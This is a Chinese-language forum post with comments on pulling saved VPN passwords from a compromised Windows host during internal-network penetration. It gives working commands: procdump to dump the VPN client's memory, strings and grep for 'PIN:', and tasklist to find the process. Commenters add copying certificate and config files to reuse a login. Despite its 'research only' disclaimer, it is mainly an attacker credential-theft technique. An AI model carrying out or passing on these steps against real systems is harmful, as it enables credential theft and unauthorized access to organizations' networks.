内网渗透-VPN密码获取小技巧
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
序言
学习到的姿势,分享出来,手法也很基础,请各位师傅多多指教。
测试
VPN
一般情况下,我们进行内网渗透过程中获取到管理员或者其他目标主机时多数情况会遇到主机中存在VPN连接客户端并大多数都是保存密码,如图:
星号查看器
此时获取目标时一般情况下会想到星号查看器,但是由于客户端做了防护,无法用星号查看器获取到内容,如图:
密码获取
发现当Client端当用户密码错误时会出现在内存中,我们可以将正确的密码后面加个字符(如:$)
然后我们将Client进程的内存进行dump,这里使用procdump,然后strings一下
# 需提前查看Client的PID或者直接使用Client进程名称
procdump64.exe -accepteula -ma 14256 vpn.dmp
strings vpn.dmp | grep -F 'PIN:' -A 6
写到最后
以上测试过程纯属本人杜撰,请遵守《网络安全法》等相关法律法规。
Windows下 strings会出搜索不到的问题,另外为文本再查找就可以解决
也有vpn客户端工具会保存证书,直接将包含配置文件的文件及其程序复制到本地,运行也可以登陆。
@小维 比如保存了vpn密码 当前未连接vpn
操作略骚
@sunwear 为何进程会没运行起来?
如果进程没运行起来如何读取呀?
@1590307279601171 实践使用可以直接procdump64.exe -accepteula -ma 14256 vpn.dmp --> 将PID 直接更改为xxxxClient.exe
@1590307279601171 这里故意少的,避免出现程序名称等,故用了PID,谢谢师傅补充
这里面还少了一个步骤,procdump64.exe -accepteula -ma 14256 vpn.dmp 这一步之前需要知道vpn程序的PID,先执行tasklist | findstr VPN.exe 才能获取到对应的内存,缩小范围。
学到了